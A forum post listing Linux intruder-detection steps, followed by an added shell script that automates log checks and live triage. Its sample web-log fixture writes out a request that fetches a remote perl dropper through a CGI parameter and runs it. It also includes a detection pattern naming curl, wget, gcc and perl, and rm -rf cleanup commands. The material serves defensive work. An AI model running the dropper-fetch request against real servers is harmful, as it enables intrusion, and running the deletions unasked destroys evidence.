
siosios

How-to detect a possible intruder (Linux Server)

Quote Originally Posted by siosios
Advice: these are steps compiled from the net and from some books; they were not written by me.

Hello..

I have a few incomplete steps to see if I have an intruder in my Linux system, but I would really like to have all your suggestions to make a good doc about this matter, so please post your tips and tricks on this subject.

1.- Download and run Rkhunter & Chkrootkit.
2.- Run "w" and "netstat -nalp | grep "SSHPORTHERE"" to see who is connected using SSH.
3.- Search for accepted ssh and ftp logins.

Code:
last
cat /var/log/secure* | grep ssh | grep Accepted
cat /var/log/secure* | grep ftp | grep Accepted
grep ftp /var/log/messages | less
4.- Watch current connections and scan your ports.

Code:
netstat -nalp
nmap -p 1-65535 localhost
5.- Search for suspicious content in commonly exploited dirs.

Code:
# list first, so the evidence is seen before anything is removed
ls /tmp -lab
ls /var/tmp -labR
ls /dev/shm -labR
ls /usr/local/apache/proxy -labR
ls /usr/local/samba -labR
# then clean up the usual dropper locations
rm -rf /tmp/sess*
rm -rf /var/dos-*
rm -rf /var/tmp/ssh-*
rm -rf /var/tmp/dos-*
6.- Check for anomalies in these files.

Code:
less /etc/passwd
less /etc/shadow
less /etc/group
7.- Search for new users in sudoers, check wtmp, and check that telnet is not running.

Code:
cat /etc/sudoers
who /var/log/wtmp
cat /etc/xinetd.d/telnet
8.- Find bash history files.

Code:
find / -iname .bash_history
9.- Verify the crontab table.

Code:
crontab -l
10.- Update the slocate database and search for exploits.

Code:
updatedb &
For cPanel servers:

Code:
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl) ' /usr/local/apache/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl) ' /home/*/statistics/logs/*
For Ensim servers:

Code:
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl) ' /home/virtual/site*/fst/var/log/httpd/*
Search for shellcode (a NOP sled shows up in the logs as repeated \x90 bytes):

Code:
cat /path/of/your/web/logs/* | grep -F '\x90'
11.- Search for hidden dirs.

Code:
locate "..."
locate ".. "
locate " .."
locate ". "
locate " ."
12.- Search for running perl scripts.

Code:
ps aux | grep perl
13.- Check the nobody user and its open files.

Code:
service httpd stop
lsof -u nobody
Please add your tips and tricks about this.


Updated 12-26-2011 at 09:48 PM by siosios
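The checks above are typed one at a time and several of them read logs that a responder usually wants to parse rather than eyeball. The script below is an added example, not code from the post or its author: it turns steps 3, 10 and 11 into shell functions that run over constructed sample data (the log lines and directory names are made up for this example, in Red Hat style /var/log/secure and Apache combined-log format), and adds a `triage_live` function that runs the live commands on a real host and saves everything to a directory before anything is deleted. It goes a little beyond the post in two places, both assumptions on my part: it lists every user's crontab rather than only root's, and it falls back to `ss` where `netstat` is absent.

```shell
#!/bin/sh
# Added example (not from the original post): offline versions of the post's
# log checks, plus a live triage wrapper. Sample data below is constructed.

# Constructed /var/log/secure entries (Red Hat style sshd and vsftpd lines).
SAMPLE_SECURE='Dec 26 20:01:02 host sshd[1234]: Accepted password for root from 203.0.113.5 port 51234 ssh2
Dec 26 20:01:10 host sshd[1240]: Failed password for admin from 198.51.100.7 port 40000 ssh2
Dec 26 20:05:00 host sshd[1301]: Accepted publickey for deploy from 10.0.0.4 port 52000 ssh2
Dec 26 20:06:00 host vsftpd[1400]: [ftpuser] OK LOGIN: Client "198.51.100.9"'

# Constructed Apache access-log entries: one clean request, two that fetch and
# run a dropper through a CGI, one carrying a literal NOP sled.
SAMPLE_WEBLOG='10.0.0.4 - - [26/Dec/2011:20:09:00 +0000] "GET /index.php HTTP/1.1" 200 2048
203.0.113.5 - - [26/Dec/2011:20:10:00 +0000] "GET /cgi-bin/test.cgi?cmd=wget http://198.51.100.7/bot.pl HTTP/1.1" 200 12
203.0.113.5 - - [26/Dec/2011:20:10:30 +0000] "GET /cgi-bin/test.cgi?cmd=perl bot.pl HTTP/1.1" 200 12
198.51.100.7 - - [26/Dec/2011:20:11:00 +0000] "GET /x.php?c=\x90\x90\x90\x90 HTTP/1.1" 404 0'

# Step 3: print "user source-ip" for every accepted sshd login read from stdin.
# Fields are located by the "for" / "from" keywords so the auth method
# (password, publickey) does not shift the columns.
ssh_accepted() {
  awk '/sshd\[/ && /Accepted/ {
         for (i = 1; i <= NF; i++) {
           if ($i == "for")  u = $(i + 1)
           if ($i == "from") h = $(i + 1)
         }
         print u, h
       }'
}

# Step 10: count stdin lines matching the post's dropper pattern (chr( or
# system(, or a fetch/build tool followed by a space), case-insensitive.
# grep -c exits 1 when nothing matches, hence the || true under set -e.
webshell_hits() {
  grep -Eic '(chr\(|system\()|(curl|wget|chmod|gcc|perl) ' || true
}

# Step 10: count stdin lines containing a literal NOP sled. -F makes grep treat
# the backslash as an ordinary character instead of an escape.
nop_sled_hits() {
  grep -Fc '\x90\x90' || true
}

# Step 11: directories under $1 whose name is only dots and/or spaces
# ("...", ".. ", " .", and so on), the names used to hide droppers in /tmp.
hidden_dirs() {
  find "$1" -mindepth 1 -type d | grep -E '/[ .]+$' || true
}

# Live triage (run as root on the suspect host; not exercised by the sample
# data). Writes every result to one directory so evidence is kept, and only
# then is it the operator's call what to delete.
triage_live() {
  out=${1:-/root/triage-$(date +%Y%m%d%H%M%S)}
  mkdir -p "$out"
  last -F > "$out/last.txt" 2>&1
  cat /var/log/secure* 2>/dev/null | ssh_accepted > "$out/ssh-accepted.txt"
  netstat -nalp > "$out/netstat.txt" 2>&1 || ss -tulpan > "$out/netstat.txt" 2>&1
  for u in $(cut -d: -f1 /etc/passwd); do
    crontab -l -u "$u" 2>/dev/null | sed "s/^/$u: /"
  done > "$out/crontabs.txt"
  for d in /tmp /var/tmp /dev/shm; do hidden_dirs "$d"; done > "$out/hidden-dirs.txt"
  ps aux | grep '[p]erl' > "$out/perl-procs.txt"
  lsof -u nobody > "$out/lsof-nobody.txt" 2>&1
  echo "triage written to $out"
}
```

To use it offline, source the file and pipe logs into the functions (`cat /var/log/secure* | ssh_accepted`, `cat /var/log/httpd/access_log* | webshell_hits`); on a live box call `triage_live /root/triage` and read the files it produces. Keeping the rm lines out of the wrapper is deliberate: once `/tmp/sess*` is gone you can no longer tell what was dropped there or when.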
